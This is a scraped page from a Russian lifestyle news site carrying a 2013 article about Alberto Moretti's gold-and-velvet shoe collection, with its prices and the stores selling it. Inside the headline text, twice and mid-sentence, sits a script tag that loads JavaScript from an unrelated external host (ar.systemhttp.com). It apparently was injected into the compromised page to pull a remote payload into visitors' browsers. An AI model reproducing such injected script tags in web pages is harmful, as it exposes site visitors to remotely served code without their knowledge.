Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Туфелька для Золушки из золота в 24 карата от Alberto Moretti

Туфелька для Золушки из золота в 24 карата от Alberto Moretti

15 авг 2013, 10:11    odenisova
0 комментариев    4 839 просмотров

Туфелька <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для Золушки из золота в 24 карата от Alberto Moretti

Вышла в свет коллекция обуви из настоящего золота, идея которой принадлежит молодому итальянскому дизайнеру Альберто Моретти. Он прославился, благодаря обувной серии из бархата и был прозван «мастером дизайна с сердцем из бархата».

 

В разработке этой поистине роскошной коллекции принимал участие знаменитый обувной бренд HORO. В ней представлены модели туфель для мужчин и женщин, материалом для которых стал так полюбившийся Моретти благородный бархат. Но самое интересное в том, что они выполнены с использованием натурального 24-каратного золота.

 

Туфельки из золота, без сомнения, по достоинству оценят Принцы и Принцессы наших дней, ведь в них можно пойти куда угодно, хоть во дворец на королевский бал.

 

Счастливые обладатели «золоченой» обуви всегда будут в центре внимания, ведь она пока является эксклюзивной и редкой. И причина этому, само собой, кроется не столько в присутствии золота, а в большей степени обусловлена несомненным харизматическим обаянием Альберто Моретти и его оригинальными дизайнерскими находками.

Туфелька <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для Золушки из золота в 24 карата от Alberto MorettiВ числе поклонников брендовой обуви такие звезды, как Эль Макферсон, Камерон Диаз, нетривиальный Элтон Джон, и даже эпатажная Леди Гага.

 

Вне сомнения, «королевская» обувь и цены имеет соответственные. Например, за золотые туфли от Alberto Moretti придется отдать  сумму  от 2500 до 5000 долларов.

 

Обувь из новой коллекции пока можно приобрести только в универмагах Нью-Йорка, Лондона, Гонконга, Дубая и Лос-Анджелеса.

 

 

Читайте также
29 ноя 2007, 12:52    0 комментариев
Мы никогда и ничего не жалеем для наших маленьких домашних питомцев. Их преданность и умение поднять настроение невозможно...
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent